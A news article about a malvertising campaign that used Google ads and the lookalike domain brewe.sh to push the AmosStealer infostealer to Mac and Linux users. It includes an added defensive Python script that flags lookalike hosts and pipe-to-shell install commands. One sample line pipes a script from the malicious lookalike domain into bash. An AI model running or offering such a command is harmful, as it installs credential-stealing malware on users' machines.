Fake Homebrew Google ads target Mac users with malware
by Bill Toulas · BleepingComputer

Hackers are once again abusing Google ads to spread malware, using a fake Homebrew website to infect Macs and Linux devices with an infostealer that steals credentials, browser data, and cryptocurrency wallets.
The malicious Google ads campaign was spotted by Ryan Chenkie, who warned on X about the risk of malware infection.
The malware used in this campaign is AmosStealer (aka 'Atomic'), an infostealer designed for macOS systems and sold to cybercriminals as a subscription for $1,000/month.
The malware was seen recently in other malvertising campaigns promoting fake Google Meet conferencing pages and is currently the go-to stealer for cybercriminals targeting Apple users.
Targeting Homebrew users
Homebrew is a popular open-source package manager for macOS and Linux, allowing users to install, update, and manage software from the command line.
A malicious Google advertisement displayed the correct Homebrew URL, "brew.sh," tricking even users familiar with the project into clicking it. However, the ad redirected them to a fake Homebrew site hosted at "brewe.sh" instead.
Malvertisers have extensively used this URL technique to trick users into clicking on what seems to be the legitimate website for a project or organization.
Upon reaching the site, the visitor is prompted to install Homebrew by pasting the command shown into the macOS Terminal or a Linux shell prompt. The legitimate Homebrew site provides a similar command for installing the legitimate software.
However, the command shown by the fake website downloads and executes malware on the device.
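The lure here combines a one-character lookalike domain (brewe.sh for brew.sh) with the familiar "paste this into your terminal" install pattern. The script below is an added example, not code from the article or from the Homebrew project: it takes a pasted install command, pulls out every URL, classifies each host as trusted, lookalike or unknown against an allowlist, and flags the pipe-to-shell pattern. The allowlist and the sample commands are assumptions for illustration.

```python
"""Check a copy-pasted 'install via shell' command for lookalike download hosts."""
import re
from urllib.parse import urlparse

# Hosts a team trusts for Homebrew installers (assumed for this example).
TRUSTED_HOSTS = {"brew.sh", "raw.githubusercontent.com"}

URL_RE = re.compile(r"""https?://[^\s'")|;]+""")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(sudo\s+)?(ba|z)?sh\b")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_host(host: str) -> str:
    """Return 'trusted', 'lookalike' or 'unknown' for a download host."""
    host = host.lower().rstrip(".")
    if host in TRUSTED_HOSTS or any(host.endswith("." + t) for t in TRUSTED_HOSTS):
        return "trusted"
    # brewe.sh sits at distance 1 from brew.sh; treat anything within 2 as a lookalike.
    if any(edit_distance(host, t) <= 2 for t in TRUSTED_HOSTS):
        return "lookalike"
    return "unknown"


def check_install_command(cmd: str) -> list:
    """Return (host, verdict, piped_to_shell) for every URL in a pasted command."""
    piped = bool(PIPE_TO_SHELL_RE.search(cmd))
    findings = []
    for url in URL_RE.findall(cmd):
        host = urlparse(url).hostname or ""
        findings.append((host, classify_host(host), piped))
    return findings


if __name__ == "__main__":
    # Constructed samples: the first has the shape of Homebrew's documented installer,
    # the second imitates a fake-site command pointing at the lookalike domain.
    real = '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'
    fake = "curl -fsSL https://brewe.sh/install.sh | bash"
    for c in (real, fake):
        print(check_install_command(c))
```

A "lookalike" verdict, or an "unknown" host combined with piping to a shell, is the signal to stop and compare the command against the project's documented one before running it.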
Security researcher JAMESWT found that the malware dropped in this case [VirusTotal] is Amos, a powerful infostealer that targets over 50 cryptocurrency extensions, desktop wallets, and data stored on web browsers.
Homebrew's project leader, Mike McQuaid, stated that the project is aware of the situation but highlighted that it's beyond its control, criticizing Google for its lack of scrutiny.
"Mac Homebrew Project Leader here. This seems taken down now," tweeted McQuaid.
"There's little we can do about this really, it keeps happening again and again and Google seems to like taking money from scammers. Please signal-boost this and hopefully someone at Google will fix this for good."
At the time of writing, the malicious ad has been taken down, but the campaign could continue via other redirection domains, so Homebrew users need to be wary of sponsored ads for the project.
Unfortunately, malicious ads continue to be a problem in Google Search results for various search terms, even for Google Ads itself.
In that campaign, the threat actors targeted Google advertisers to steal their accounts and run malicious campaigns under the guise of legitimate and verified entities.
To minimize the risk of malware infection, whenever clicking on a link in Google, ensure that you are brought to the legitimate site for a project or company before entering sensitive information or downloading software.
Another safe method is to bookmark official project websites you need to visit often for sourcing software and use those instead of searching online every time.